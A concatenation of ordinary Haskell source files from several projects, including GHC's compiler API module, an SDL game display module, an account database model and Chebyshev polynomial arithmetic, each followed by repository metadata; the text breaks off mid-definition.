   hsc_env <- getSession
   mod_info <- liftIO $ compileOne' (Just tcg) Nothing
                                    hsc_env ms 1 1 Nothing mb_linkable
                                    source_modified

   -- Record the freshly compiled module in the home package table.
   modifySession $ \e -> e{ hsc_HPT = addToUFM (hsc_HPT e) mod mod_info }
   return tcm
-- %************************************************************************
-- %* *
-- Dealing with Core
-- %* *
-- %************************************************************************
-- | A CoreModule consists of just the fields of a 'ModGuts' that are needed for
-- the 'GHC.compileToCoreModule' interface.
data CoreModule
  = CoreModule {
      -- | Module name
      cm_module   :: !Module,
      -- | Type environment for types declared in this module
      cm_types    :: !TypeEnv,
      -- | Declarations
      cm_binds    :: CoreProgram,
      -- | Safe Haskell mode
      cm_safe     :: SafeHaskellMode
    }

instance Outputable CoreModule where
   ppr (CoreModule {cm_module = mn, cm_types = te, cm_binds = cb,
                    cm_safe = sf})
    = text "%module" <+> ppr mn <+> parens (ppr sf) <+> ppr te
      $$ vcat (map ppr cb)
-- | This is the way to get access to the Core bindings corresponding
-- to a module. 'compileToCore' parses, typechecks, and
-- desugars the module, then returns the resulting Core module (consisting of
-- the module name, type declarations, and function declarations) if
-- successful.
compileToCoreModule :: GhcMonad m => FilePath -> m CoreModule
compileToCoreModule = compileCore False
-- | Like compileToCoreModule, but invokes the simplifier, so
-- as to return simplified and tidied Core.
compileToCoreSimplified :: GhcMonad m => FilePath -> m CoreModule
compileToCoreSimplified = compileCore True
-- | Shared worker for 'compileToCoreModule' and 'compileToCoreSimplified':
-- set the file as the sole target, load, locate its summary in the module
-- graph, then parse/typecheck/desugar (and optionally simplify + tidy).
compileCore :: GhcMonad m => Bool -> FilePath -> m CoreModule
compileCore simplify fn = do
   -- First, set the target to the desired filename
   target <- guessTarget fn Nothing
   addTarget target
   _ <- load LoadAllTargets
   -- Then find dependencies
   modGraph <- depanal [] True
   case find ((== fn) . msHsFilePath) modGraph of
     Just modSummary -> do
       -- Now we have the module name;
       -- parse, typecheck and desugar the module
       mod_guts <- coreModule `fmap`
                      -- TODO: space leaky: call hsc* directly?
                      (desugarModule =<< typecheckModule =<< parseModule modSummary)
       liftM (gutsToCoreModule (mg_safe_haskell mod_guts)) $
         if simplify
          then do
             -- If simplify is true: simplify (hscSimplify), then tidy
             -- (tidyProgram).
             hsc_env <- getSession
             simpl_guts <- liftIO $ hscSimplify hsc_env mod_guts
             tidy_guts  <- liftIO $ tidyProgram hsc_env simpl_guts
             return $ Left tidy_guts
          else
             return $ Right mod_guts
     -- BUG FIX: this panic message was previously split with a malformed
     -- string gap (the continuation line lacked its leading backslash),
     -- which is a syntax error; it is now a single well-formed literal.
     Nothing -> panic "compileToCoreModule: target FilePath not found in module dependency graph"
  where -- two versions, based on whether we simplify (thus run tidyProgram,
        -- which returns a (CgGuts, ModDetails) pair, or not (in which case
        -- we just have a ModGuts.
        gutsToCoreModule :: SafeHaskellMode
                         -> Either (CgGuts, ModDetails) ModGuts
                         -> CoreModule
        gutsToCoreModule safe_mode (Left (cg, md)) = CoreModule {
          cm_module = cg_module cg,
          cm_types  = md_types md,
          cm_binds  = cg_binds cg,
          cm_safe   = safe_mode
        }
        gutsToCoreModule safe_mode (Right mg) = CoreModule {
          cm_module = mg_module mg,
          cm_types  = typeEnvFromEntities (bindersOfBinds (mg_binds mg))
                                          (mg_tcs mg)
                                          (mg_fam_insts mg),
          cm_binds  = mg_binds mg,
          cm_safe   = safe_mode
        }
-- %************************************************************************
-- %* *
-- Inspecting the session
-- %* *
-- %************************************************************************
-- | Get the module dependency graph.
getModuleGraph :: GhcMonad m => m ModuleGraph -- ToDo: DiGraph ModSummary
getModuleGraph = liftM hsc_mod_graph getSession
-- | Determines whether a set of modules requires Template Haskell.
--
-- Note that if the session's 'DynFlags' enabled Template Haskell when
-- 'depanal' was called, then each module in the returned module graph will
-- have Template Haskell enabled whether it is actually needed or not.
needsTemplateHaskell :: ModuleGraph -> Bool
needsTemplateHaskell ms =
any (xopt Opt_TemplateHaskell . ms_hspp_opts) ms
-- | Return @True@ <==> module is loaded.
isLoaded :: GhcMonad m => ModuleName -> m Bool
isLoaded m = withSession $ \hsc_env ->
return $! isJust (lookupUFM (hsc_HPT hsc_env) m)
-- | Return the bindings for the current interactive session.
getBindings :: GhcMonad m => m [TyThing]
getBindings = withSession $ \hsc_env ->
return $ icInScopeTTs $ hsc_IC hsc_env
-- | Return the instances for the current interactive session.
getInsts :: GhcMonad m => m ([ClsInst], [FamInst])
getInsts = withSession $ \hsc_env ->
return $ ic_instances (hsc_IC hsc_env)
getPrintUnqual :: GhcMonad m => m PrintUnqualified
getPrintUnqual = withSession $ \hsc_env ->
return (icPrintUnqual (hsc_dflags hsc_env) (hsc_IC hsc_env))
-- | Container for information about a 'Module'.
data ModuleInfo = ModuleInfo {
minf_type_env :: TypeEnv,
minf_exports :: NameSet, -- ToDo, [AvailInfo] like ModDetails?
minf_rdr_env :: Maybe GlobalRdrEnv, -- Nothing for a compiled/package mod
minf_instances :: [ClsInst],
minf_iface :: Maybe ModIface,
minf_safe :: SafeHaskellMode
#ifdef GHCI
,minf_modBreaks :: ModBreaks
#endif
}
-- We don't want HomeModInfo here, because a ModuleInfo applies
-- to package modules too.
-- | Request information about a loaded 'Module'
getModuleInfo :: GhcMonad m => Module -> m (Maybe ModuleInfo) -- XXX: Maybe X
getModuleInfo mdl = withSession $ \hsc_env -> do
let mg = hsc_mod_graph hsc_env
if mdl `elem` map ms_mod mg
then liftIO $ getHomeModuleInfo hsc_env mdl
else do
{- if isHomeModule (hsc_dflags hsc_env) mdl
then return Nothing
else -} liftIO $ getPackageModuleInfo hsc_env mdl
-- ToDo: we don't understand what the following comment means.
-- (SDM, 19/7/2011)
-- getPackageModuleInfo will attempt to find the interface, so
-- we don't want to call it for a home module, just in case there
-- was a problem loading the module and the interface doesn't
-- exist... hence the isHomeModule test here. (ToDo: reinstate)
getPackageModuleInfo :: HscEnv -> Module -> IO (Maybe ModuleInfo)
#ifdef GHCI
getPackageModuleInfo hsc_env mdl
= do eps <- hscEPS hsc_env
iface <- hscGetModuleInterface hsc_env mdl
let
avails = mi_exports iface
names = availsToNameSet avails
pte = eps_PTE eps
tys = [ ty | name <- concatMap availNames avails,
Just ty <- [lookupTypeEnv pte name] ]
--
return (Just (ModuleInfo {
minf_type_env = mkTypeEnv tys,
minf_exports = names,
minf_rdr_env = Just $! availsToGlobalRdrEnv (moduleName mdl) avails,
minf_instances = error "getModuleInfo: instances for package module unimplemented",
minf_iface = Just iface,
minf_safe = getSafeMode $ mi_trust iface,
minf_modBreaks = emptyModBreaks
}))
#else
-- bogusly different for non-GHCI (ToDo)
getPackageModuleInfo _hsc_env _mdl = do
return Nothing
#endif
getHomeModuleInfo :: HscEnv -> Module -> IO (Maybe ModuleInfo)
getHomeModuleInfo hsc_env mdl =
case lookupUFM (hsc_HPT hsc_env) (moduleName mdl) of
Nothing -> return Nothing
Just hmi -> do
let details = hm_details hmi
iface = hm_iface hmi
return (Just (ModuleInfo {
minf_type_env = md_types details,
minf_exports = availsToNameSet (md_exports details),
minf_rdr_env = mi_globals $! hm_iface hmi,
minf_instances = md_insts details,
minf_iface = Just iface,
minf_safe = getSafeMode $ mi_trust iface
#ifdef GHCI
,minf_modBreaks = getModBreaks hmi
#endif
}))
-- | The list of top-level entities defined in a module
modInfoTyThings :: ModuleInfo -> [TyThing]
modInfoTyThings minf = typeEnvElts (minf_type_env minf)
modInfoTopLevelScope :: ModuleInfo -> Maybe [Name]
modInfoTopLevelScope minf
= fmap (map gre_name . globalRdrEnvElts) (minf_rdr_env minf)
modInfoExports :: ModuleInfo -> [Name]
modInfoExports minf = nameSetElems $! minf_exports minf
-- | Returns the instances defined by the specified module.
-- Warning: currently unimplemented for package modules.
modInfoInstances :: ModuleInfo -> [ClsInst]
modInfoInstances = minf_instances
modInfoIsExportedName :: ModuleInfo -> Name -> Bool
modInfoIsExportedName minf name = elemNameSet name (minf_exports minf)
mkPrintUnqualifiedForModule :: GhcMonad m =>
ModuleInfo
-> m (Maybe PrintUnqualified) -- XXX: returns a Maybe X
mkPrintUnqualifiedForModule minf = withSession $ \hsc_env -> do
return (fmap (mkPrintUnqualified (hsc_dflags hsc_env)) (minf_rdr_env minf))
modInfoLookupName :: GhcMonad m =>
ModuleInfo -> Name
-> m (Maybe TyThing) -- XXX: returns a Maybe X
modInfoLookupName minf name = withSession $ \hsc_env -> do
case lookupTypeEnv (minf_type_env minf) name of
Just tyThing -> return (Just tyThing)
Nothing -> do
eps <- liftIO $ readIORef (hsc_EPS hsc_env)
return $! lookupType (hsc_dflags hsc_env)
(hsc_HPT hsc_env) (eps_PTE eps) name
modInfoIface :: ModuleInfo -> Maybe ModIface
modInfoIface = minf_iface
-- | Retrieve module safe haskell mode
modInfoSafe :: ModuleInfo -> SafeHaskellMode
modInfoSafe = minf_safe
#ifdef GHCI
modInfoModBreaks :: ModuleInfo -> ModBreaks
modInfoModBreaks = minf_modBreaks
#endif
isDictonaryId :: Id -> Bool
isDictonaryId id
= case tcSplitSigmaTy (idType id) of { (_tvs, _theta, tau) -> isDictTy tau }
-- | Looks up a global name: that is, any top-level name in any
-- visible module. Unlike 'lookupName', lookupGlobalName does not use
-- the interactive context, and therefore does not require a preceding
-- 'setContext'.
lookupGlobalName :: GhcMonad m => Name -> m (Maybe TyThing)
lookupGlobalName name = withSession $ \hsc_env -> do
liftIO $ lookupTypeHscEnv hsc_env name
findGlobalAnns :: (GhcMonad m, Typeable a) => ([Word8] -> a) -> AnnTarget Name -> m [a]
findGlobalAnns deserialize target = withSession $ \hsc_env -> do
ann_env <- liftIO $ prepareAnnotations hsc_env Nothing
return (findAnns deserialize ann_env target)
#ifdef GHCI
-- | get the GlobalRdrEnv for a session
getGRE :: GhcMonad m => m GlobalRdrEnv
getGRE = withSession $ \hsc_env-> return $ ic_rn_gbl_env (hsc_IC hsc_env)
#endif
-- -----------------------------------------------------------------------------
{- ToDo: Move the primary logic here to compiler/main/Packages.hs
-- | Return all /external/ modules available in the package database.
-- Modules from the current session (i.e., from the 'HomePackageTable') are
-- not included. This includes module names which are reexported by packages.
packageDbModules :: GhcMonad m =>
Bool -- ^ Only consider exposed packages.
-> m [Module]
packageDbModules only_exposed = do
dflags <- getSessionDynFlags
let pkgs = eltsUFM (pkgIdMap (pkgState dflags))
return $
[ mkModule pid modname
| p <- pkgs
, not only_exposed || exposed p
, let pid = packageConfigId p
, modname <- exposedModules p
++ map exportName (reexportedModules p) ]
-}
-- -----------------------------------------------------------------------------
-- Misc exported utils
dataConType :: DataCon -> Type
dataConType dc = idType (dataConWrapId dc)
-- | print a 'NamedThing', adding parentheses if the name is an operator.
pprParenSymName :: NamedThing a => a -> SDoc
pprParenSymName a = parenSymOcc (getOccName a) (ppr (getName a))
-- ----------------------------------------------------------------------------
#if 0
-- ToDo:
-- - Data and Typeable instances for HsSyn.
-- ToDo: check for small transformations that happen to the syntax in
-- the typechecker (eg. -e ==> negate e, perhaps for fromIntegral)
-- ToDo: maybe use TH syntax instead of IfaceSyn? There's already a way
-- to get from TyCons, Ids etc. to TH syntax (reify).
-- :browse will use either lm_toplev or inspect lm_interface, depending
-- on whether the module is interpreted or not.
#endif
-- Extract the filename, stringbuffer content and dynflags associed to a module
--
-- XXX: Explain pre-conditions
getModuleSourceAndFlags :: GhcMonad m => Module -> m (String, StringBuffer, DynFlags)
getModuleSourceAndFlags mod = do
m <- getModSummary (moduleName mod)
case ml_hs_file $ ms_location m of
Nothing -> do dflags <- getDynFlags
liftIO $ throwIO $ mkApiErr dflags (text "No source available for module " <+> ppr mod)
Just sourceFile -> do
source <- liftIO $ hGetStringBuffer sourceFile
return (sourceFile, source, ms_hspp_opts m)
-- | Return module source as token stream, including comments.
--
-- The module must be in the module graph and its source must be available.
-- Throws a 'HscTypes.SourceError' on parse error.
getTokenStream :: GhcMonad m => Module -> m [Located Token]
getTokenStream mod = do
(sourceFile, source, flags) <- getModuleSourceAndFlags mod
let startLoc = mkRealSrcLoc (mkFastString sourceFile) 1 1
case lexTokenStream source startLoc flags of
POk _ ts -> return ts
PFailed span err ->
do dflags <- getDynFlags
liftIO $ throwIO $ mkSrcErr (unitBag $ mkPlainErrMsg dflags span err)
-- | Give even more information on the source than 'getTokenStream'
-- This function allows reconstructing the source completely with
-- 'showRichTokenStream'.
getRichTokenStream :: GhcMonad m => Module -> m [(Located Token, String)]
getRichTokenStream mod = do
(sourceFile, source, flags) <- getModuleSourceAndFlags mod
let startLoc = mkRealSrcLoc (mkFastString sourceFile) 1 1
case lexTokenStream source startLoc flags of
POk _ ts -> return $ addSourceToTokens startLoc source ts
PFailed span err ->
do dflags <- getDynFlags
liftIO $ throwIO $ mkSrcErr (unitBag $ mkPlainErrMsg dflags span err)
-- | Given a source location and a StringBuffer corresponding to this
-- location, return a rich token stream with the source associated to the
-- tokens.
addSourceToTokens :: RealSrcLoc -> StringBuffer -> [Located Token]
-> [(Located Token, String)]
addSourceToTokens _ _ [] = []
addSourceToTokens loc buf (t@(L span _) : ts)
= case span of
UnhelpfulSpan _ -> (t,"") : addSourceToTokens loc buf ts
RealSrcSpan s -> (t,str) : addSourceToTokens newLoc newBuf ts
where
(newLoc, newBuf, str) = go "" loc buf
start = realSrcSpanStart s
end = realSrcSpanEnd s
go acc loc buf | loc < start = go acc nLoc nBuf
| start <= loc && loc < end = go (ch:acc) nLoc nBuf
| otherwise = (loc, buf, reverse acc)
where (ch, nBuf) = nextChar buf
nLoc = advanceSrcLoc loc ch
-- | Take a rich token stream such as produced from 'getRichTokenStream' and
-- return source code almost identical to the original code (except for
-- insignificant whitespace.)
showRichTokenStream :: [(Located Token, String)] -> String
showRichTokenStream ts = go startLoc ts ""
where sourceFile = getFile $ map (getLoc . fst) ts
getFile [] = panic "showRichTokenStream: No source file found"
getFile (UnhelpfulSpan _ : xs) = getFile xs
getFile (RealSrcSpan s : _) = srcSpanFile s
startLoc = mkRealSrcLoc sourceFile 1 1
go _ [] = id
go loc ((L span _, str):ts)
= case span of
UnhelpfulSpan _ -> go loc ts
RealSrcSpan s
| locLine == tokLine -> ((replicate (tokCol - locCol) ' ') ++)
. (str ++)
. go tokEnd ts
| otherwise -> ((replicate (tokLine - locLine) '\n') ++)
. ((replicate (tokCol - 1) ' ') ++)
. (str ++)
. go tokEnd ts
where (locLine, locCol) = (srcLocLine loc, srcLocCol loc)
(tokLine, tokCol) = (srcSpanStartLine s, srcSpanStartCol s)
tokEnd = realSrcSpanEnd s
-- -----------------------------------------------------------------------------
-- Interactive evaluation
-- | Takes a 'ModuleName' and possibly a 'PackageKey', and consults the
-- filesystem and package database to find the corresponding 'Module',
-- using the algorithm that is used for an @import@ declaration.
findModule :: GhcMonad m => ModuleName -> Maybe FastString -> m Module
findModule mod_name maybe_pkg = withSession $ \hsc_env -> do
let
dflags = hsc_dflags hsc_env
this_pkg = thisPackage dflags
--
case maybe_pkg of
Just pkg | fsToPackageKey pkg /= this_pkg && pkg /= fsLit "this" -> liftIO $ do
res <- findImportedModule hsc_env mod_name maybe_pkg
case res of
Found _ m -> return m
err -> throwOneError $ noModError dflags noSrcSpan mod_name err
_otherwise -> do
home <- lookupLoadedHomeModule mod_name
case home of
Just m -> return m
Nothing -> liftIO $ do
res <- findImportedModule hsc_env mod_name maybe_pkg
case res of
Found loc m | modulePackageKey m /= this_pkg -> return m
| otherwise -> modNotLoadedError dflags m loc
err -> throwOneError $ noModError dflags noSrcSpan mod_name err
modNotLoadedError :: DynFlags -> Module -> ModLocation -> IO a
modNotLoadedError dflags m loc = throwGhcExceptionIO $ CmdLineError $ showSDoc dflags $
text "module is not loaded:" <+>
quotes (ppr (moduleName m)) <+>
parens (text (expectJust "modNotLoadedError" (ml_hs_file loc)))
-- | Like 'findModule', but differs slightly when the module refers to
-- a source file, and the file has not been loaded via 'load'. In
-- this case, 'findModule' will throw an error (module not loaded),
-- but 'lookupModule' will check to see whether the module can also be
-- found in a package, and if so, that package 'Module' will be
-- returned. If not, the usual module-not-found error will be thrown.
--
lookupModule :: GhcMonad m => ModuleName -> Maybe FastString -> m Module
lookupModule mod_name (Just pkg) = findModule mod_name (Just pkg)
lookupModule mod_name Nothing = withSession $ \hsc_env -> do
home <- lookupLoadedHomeModule mod_name
case home of
Just m -> return m
Nothing -> liftIO $ do
res <- findExposedPackageModule hsc_env mod_name Nothing
case res of
Found _ m -> return m
err -> throwOneError $ noModError (hsc_dflags hsc_env) noSrcSpan mod_name err
lookupLoadedHomeModule :: GhcMonad m => ModuleName -> m (Maybe Module)
lookupLoadedHomeModule mod_name = withSession $ \hsc_env ->
case lookupUFM (hsc_HPT hsc_env) mod_name of
Just mod_info -> return (Just (mi_module (hm_iface mod_info)))
_not_a_home_module -> return Nothing
#ifdef GHCI
-- | Check that a module is safe to import (according to Safe Haskell).
--
-- We return True to indicate the import is safe and False otherwise
-- although in the False case an error may be thrown first.
isModuleTrusted :: GhcMonad m => Module -> m Bool
isModuleTrusted m = withSession $ \hsc_env ->
liftIO $ hscCheckSafe hsc_env m noSrcSpan
-- | Return if a module is trusted and the pkgs it depends on to be trusted.
moduleTrustReqs :: GhcMonad m => Module -> m (Bool, [PackageKey])
moduleTrustReqs m = withSession $ \hsc_env ->
liftIO $ hscGetSafe hsc_env m noSrcSpan
-- | EXPERIMENTAL: DO NOT USE.
--
-- Set the monad GHCi lifts user statements into.
--
-- Checks that a type (in string form) is an instance of the
-- @GHC.GHCi.GHCiSandboxIO@ type class. Sets it to be the GHCi monad if it is,
-- throws an error otherwise.
{-# WARNING setGHCiMonad "This is experimental! Don't use." #-}
setGHCiMonad :: GhcMonad m => String -> m ()
setGHCiMonad name = withSession $ \hsc_env -> do
ty <- liftIO $ hscIsGHCiMonad hsc_env name
modifySession $ \s ->
let ic = (hsc_IC s) { ic_monad = ty }
in s { hsc_IC = ic }
getHistorySpan :: GhcMonad m => History -> m SrcSpan
getHistorySpan h = withSession $ \hsc_env ->
return $ InteractiveEval.getHistorySpan hsc_env h
obtainTermFromVal :: GhcMonad m => Int -> Bool -> Type -> a -> m Term
obtainTermFromVal bound force ty a = withSession $ \hsc_env ->
liftIO $ InteractiveEval.obtainTermFromVal hsc_env bound force ty a
obtainTermFromId :: GhcMonad m => Int -> Bool -> Id -> m Term
obtainTermFromId bound force id = withSession $ \hsc_env ->
liftIO $ InteractiveEval.obtainTermFromId hsc_env bound force id
#endif
-- | Returns the 'TyThing' for a 'Name'. The 'Name' may refer to any
-- entity known to GHC, including 'Name's defined using 'runStmt'.
lookupName :: GhcMonad m => Name -> m (Maybe TyThing)
lookupName name =
withSession $ \hsc_env ->
liftIO $ hscTcRcLookupName hsc_env name
-- -----------------------------------------------------------------------------
-- Pure API
-- | A pure interface to the module parser.
--
parser :: String -- ^ Haskell module source text (full Unicode is supported)
-> DynFlags -- ^ the flags
-> FilePath -- ^ the filename (for source locations)
-> Either ErrorMessages (WarningMessages, Located (HsModule RdrName))
parser str dflags filename =
let
loc = mkRealSrcLoc (mkFastString filename) 1 1
buf = stringToStringBuffer str
in
case unP Parser.parseModule (mkPState dflags buf loc) of
PFailed span err ->
Left (unitBag (mkPlainErrMsg dflags span err))
POk pst rdr_module ->
let (warns,_) = getMessages pst in
Right (warns, rdr_module)
| gcampax/ghc | compiler/main/GHC.hs | bsd-3-clause | 55,602 | 4 | 28 | 15,242 | 9,846 | 5,315 | 4,531 | -1 | -1 |
module Intrust
(path
)
where
import Text.Printf
import Development.Shake
import Development.Shake.FilePath
path :: String -> String -> FilePath
path var caseid = let base = "/data/pnl/INTRuST/" in
case var of
"dwied" -> printf (base </> "%s/diff/%s-dwi-Ed.nhdr") caseid caseid
"dwimask" -> printf (base </> "%s/diff/%s-tensor-mask.nhdr") caseid caseid
"dwiharm" -> printf (base </> "Harmonization-20160728/%s_hmz_iter1.nhdr") caseid
"fsindwi" -> printf (base </> "%s/diff/%s.fsindwi.nrrd") caseid caseid
"ukf_dwiharm_cpp" -> printf (base </> "harmonized-newquery/%s/diff/%s.ukf_2T.vtk.gz") caseid caseid
_ -> error "Add this var to Intrust.hs"
{-where base = "/Users/ryan/partners/data/pnl/INTRuST/"-}
| pnlbwh/test-tensormasking | config/Intrust.hs | bsd-3-clause | 744 | 0 | 12 | 123 | 171 | 89 | 82 | 14 | 6 |
module Module4.Task9 where
data Shape = Circle Double | Rectangle Double Double
isSquare :: Shape -> Bool
isSquare (Rectangle h w) = h == w
isSquare _ = False
| dstarcev/stepic-haskell | src/Module4/Task9.hs | bsd-3-clause | 168 | 0 | 7 | 38 | 59 | 32 | 27 | 5 | 1 |
-- |Includes core Tea monad functions that regulate display and framerate
-- as well as the runTea function that initializes hardware.
module Tea.Display
( screen
, update
, runTea
, setFrameRate
) where
import qualified Graphics.UI.SDL as SDL
import qualified Graphics.UI.SDL.Mixer as Mixer
import Control.Monad.State
import Control.Monad.Trans
import Control.Applicative((<$>))
import Data.Map (empty)
import Data.Array (listArray)
import Tea.Input (KeyCode)
import Tea.TeaState
import Tea.Screen
import Tea.Tea
-- |Retrieve a buffer handle on the Screen
screen :: Tea s Screen
screen = _screen <$> getT
-- |Sets the frame rate cap. Note that this is merely a cap, and the frame rate may
-- be slower than this if additional processing is required.
setFrameRate :: Int -> Tea s ()
setFrameRate n = modifyT $ \ts -> ts { _fpsCap = 1000 `div` n }
-- |Flip buffers, causing the hardware display to be updated with changes to
-- the Screen. Note this also waits sufficient time for a frame to have elapsed.
update :: Tea s ()
update = do ts@(TS { _screen = (Screen x), _fpsCap = fps, _lastUpdate = last}) <- getT
t <- liftIO SDL.getTicks
liftIO $ do
when (fromIntegral t < last + fps) $ SDL.delay $ fromIntegral $ last + fps - fromIntegral t
SDL.tryFlip x
putT $ ts { _lastUpdate = fromIntegral t}
initialEventState = ES { keyCodes = listArray (minBound :: KeyCode, maxBound :: KeyCode) $ repeat False
, keysDown = 0
}
-- |Initialize hardware and run a Tea action with the specified state type.
runTea :: Int -- ^ Screen Width
-> Int -- ^ Screen Height
-> s -- ^ State data
-> Tea s m -- ^ Tea action
-> IO ()
runTea w h s m = do
SDL.init [SDL.InitEverything]
Mixer.openAudio 44100 Mixer.AudioS16Sys 2 1024
surf <- SDL.setVideoMode w h 0 [SDL.SWSurface]
let initialState = (TS (Screen surf) initialEventState (1000 `div` 60) 0 empty)
((v,s'), st') <- runStateT (runStateT (extractTea m) s) initialState
Mixer.closeAudio
SDL.quit
return ()
| liamoc/tea-hs | Tea/Display.hs | bsd-3-clause | 2,294 | 0 | 19 | 684 | 565 | 309 | 256 | 43 | 1 |
-- |
-- Module: FRP.Timeless.Framework.RPG.Render.Types
-- Copyright: (c) 2015 Rongcui Dong
-- License: BSD3
-- Maintainer: Rongcui Dong <karl_1702@188.com>
module FRP.Timeless.Framework.RPG.Render.Types
where
import qualified SDL as SDL
import Foreign.C.Types (CInt)
import Linear
import Linear.Affine
class RenderLayerClass r where
texture :: r -> SDL.Texture
-- | A existential type for polymorphic list
data RenderLayer = forall r . RenderLayerClass r => RenderLayer r
instance RenderLayerClass RenderLayer where
texture (RenderLayer l) = texture l
-- | A 'Camera' is just a rectangle of view inside the world
type Camera = Maybe (SDL.Rectangle CInt)
-- | A 'Projector' is basically the same as a 'Camera'
type Projector = Camera
data Scene = Scene
{
sceneLayers :: [RenderLayer]
, sceneCamera :: Camera
}
-- * Type related utilities
-- | Create a `SDL.Rectangle CInt`
cIntRect :: (Integral n) => Point V2 n -> V2 n -> SDL.Rectangle CInt
cIntRect pos@(P pv) size =
SDL.Rectangle (P $ fmap toCInt pv) (fmap toCInt size)
-- | Convert an `Integral` rectangle to `CInt`
toCRect :: (Integral n) => SDL.Rectangle n -> SDL.Rectangle CInt
toCRect (SDL.Rectangle pos size) = cIntRect pos size
-- | Convert to CInt
toCInt :: (Integral n) => n -> CInt
toCInt = fromIntegral
| carldong/timeless-RPG | src/FRP/Timeless/Framework/RPG/Render/Types.hs | bsd-3-clause | 1,320 | 0 | 9 | 253 | 315 | 176 | 139 | -1 | -1 |
module Zero.Account.Model
(
accountExists
, insertAccount
, deleteAccount
, getAccountById
, getAccountByEmail
, getVerificationStatusByEmail
, getVerificationCodeByEmail
) where
------------------------------------------------------------------------------
import Control.Monad (when, unless)
import qualified Data.Vector as V
import qualified Data.Text as T
import Zero.Persistence
import Zero.Account.Internal (Account(..), AccountStatus(..))
import Zero.Account.Relations
import Zero.Account.Verification.Internal (Verification(..), VerificationCode(..))
import Zero.Crypto (generateBytes, hexBS)
------------------------------------------------------------------------------
-- Model
------------------------------------------------------------------------------
-- | Checks whether an account exists
accountExists :: SessionId -> Connection -> Text -> IO (Bool)
accountExists sid conn s = do
maybeAccount <- getAccountByEmail sid conn s
case maybeAccount of
Just _ -> return True
Nothing -> return False
-- | Create a new account.
insertAccount :: SessionId -> Connection -> Account -> IO ()
insertAccount sid conn u@Account{..} = do
kA <- generateBytes 32
wrap_kB <- generateBytes 32
let accountAttributes' = attributesFromList (V.toList accountAttributes)
let accountTuples = mkTupleSetFromList accountAttributes' [
[ TextAtom a_userId
, TextAtom a_email
, TextAtom a_verifier
, TextAtom a_salt
, TextAtom $ hexBS kA
, TextAtom $ hexBS wrap_kB
] ]
case accountTuples of
Right tuples -> do
eRes <- executeDatabaseContextExpr sid conn (Insert "account" (MakeStaticRelation accountAttributes' tuples))
case eRes of
Left err ->
error $ show err
Right _ ->
return ()
Left err ->
error $ show err
-- | Deletes an account by its id.
deleteAccount sid conn userId = do
let p = AttributeEqualityPredicate "user_id#" (NakedAtomExpr (TextAtom userId))
let q = Delete "account" p
_ <- executeDatabaseContextExpr sid conn q
return ()
-- | Fetches an account by its Id.
getAccountById :: SessionId -> Connection -> Text -> IO (Maybe Account)
getAccountById sid conn uid = do
let p = AttributeEqualityPredicate "user_id#" (NakedAtomExpr (TextAtom uid))
let q = Restrict p (RelationVariable "account" ())
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl -> do
let accounts = accountsFromRelation rl
if not (null accounts) then
return $ Just $ head accounts
else
return Nothing
-- | Fetches an account by e-mail address.
getAccountByEmail :: SessionId -> Connection -> Text -> IO (Maybe Account)
getAccountByEmail sid conn email = do
let p = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let q = Restrict p (RelationVariable "account" ())
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl -> do
let accounts = accountsFromRelation rl
if not (null accounts) then
return $ Just $ head accounts
else
return Nothing
-- | Fetches the status of an account by e-mail address.
getVerificationStatusByEmail :: SessionId -> Connection -> Text -> IO (Maybe Verification)
getVerificationStatusByEmail sid conn email = do
let r = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let p = Project (convertAttributeNames accountVerificationAttributes) (Join accountRelationVar verificationRelationVar)
let q = Restrict r p
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl ->
return $ verificationStatusFromRelation rl
-- | Fetches the verification code associated with the supplied email address.
getVerificationCodeByEmail :: SessionId -> Connection -> Text -> IO (Maybe VerificationCode)
getVerificationCodeByEmail sid conn email = do
let r = AttributeEqualityPredicate "email#" (NakedAtomExpr (TextAtom email))
let p = Project (convertAttributeNames accountVerificationAttributes) (Join accountRelationVar verificationRelationVar)
let q = Restrict r p
rel <- executeRelationalExpr sid conn q
case rel of
Left err ->
error $ show err
Right rl ->
return $ verificationCodeFromRelation rl
| et4te/zero | server/src/Zero/Account/Model.hs | bsd-3-clause | 4,443 | 0 | 17 | 958 | 1,211 | 591 | 620 | -1 | -1 |
{-# LANGUAGE CPP #-}
-- #define DEBUG
{-# LANGUAGE TemplateHaskell #-}
{-|
Module : AERN2.Poly.Cheb.Ring
Description : Chebyshev basis ring operations
Copyright : (c) Michal Konecny
License : BSD3
Maintainer : mikkonecny@gmail.com
Stability : experimental
Portability : portable
Chebyshev basis ring operations
-}
module AERN2.Poly.Cheb.Ring
-- ( mulCheb, mulChebDirect, mulChebDCT )
where
#ifdef DEBUG
import Debug.Trace (trace)
#define maybeTrace trace
#else
#define maybeTrace ((flip const :: (String -> a -> a)))
#endif
import MixedTypesNumPrelude
-- import qualified Prelude as P
import Text.Printf
-- import Test.Hspec
-- import Test.QuickCheck
import AERN2.Normalize
-- import AERN2.MP.ErrorBound
import AERN2.MP.Ball
import AERN2.MP.Dyadic
-- import AERN2.Real
-- import AERN2.Interval
-- import AERN2.RealFun.Operations
-- import AERN2.RealFun.UnaryBallFun
import AERN2.Poly.Basics
import AERN2.Poly.Cheb.Type
import AERN2.Poly.Cheb.ShiftScale ()
import AERN2.Poly.Cheb.Maximum
import AERN2.Poly.Cheb.DCT
{- addition -}
instance
-- (PolyCoeffRing c, CanNormalize (ChPoly c))
(c ~ MPBall) =>
CanAddAsymmetric (ChPoly c) (ChPoly c)
where
type AddType (ChPoly c) (ChPoly c) = ChPoly c
add cp1@(ChPoly d1 p1 acG1 bnds1) cp2@(ChPoly d2 p2 acG2 bnds2)
| d1 == d2 =
result
-- case (chPolyBounds_valueIfConst bnds1, chPolyBounds_valueIfConst bnds2) of
-- (Just b1, _) -> b1 + cp2
-- (_, Just b2) -> cp1 + b2
-- _ -> result
| otherwise = error $ "Adding polynomials with incompatible domains"
where
acG = max acG1 acG2
result =
normalize $ ChPoly d1 (p1 + p2) acG (chPolyBounds_forChPoly result)
{- subtraction -}
instance
-- (PolyCoeffRing c, CanNormalize (ChPoly c)) =>
(c ~ MPBall) =>
CanSub (ChPoly c) (ChPoly c)
{- multiplication -}
instance
(c~MPBall) =>
CanMulAsymmetric (ChPoly c) (ChPoly c)
where
type MulType (ChPoly c) (ChPoly c) = ChPoly c
mul = mulChebNoBounds
mulChebUseBounds ::
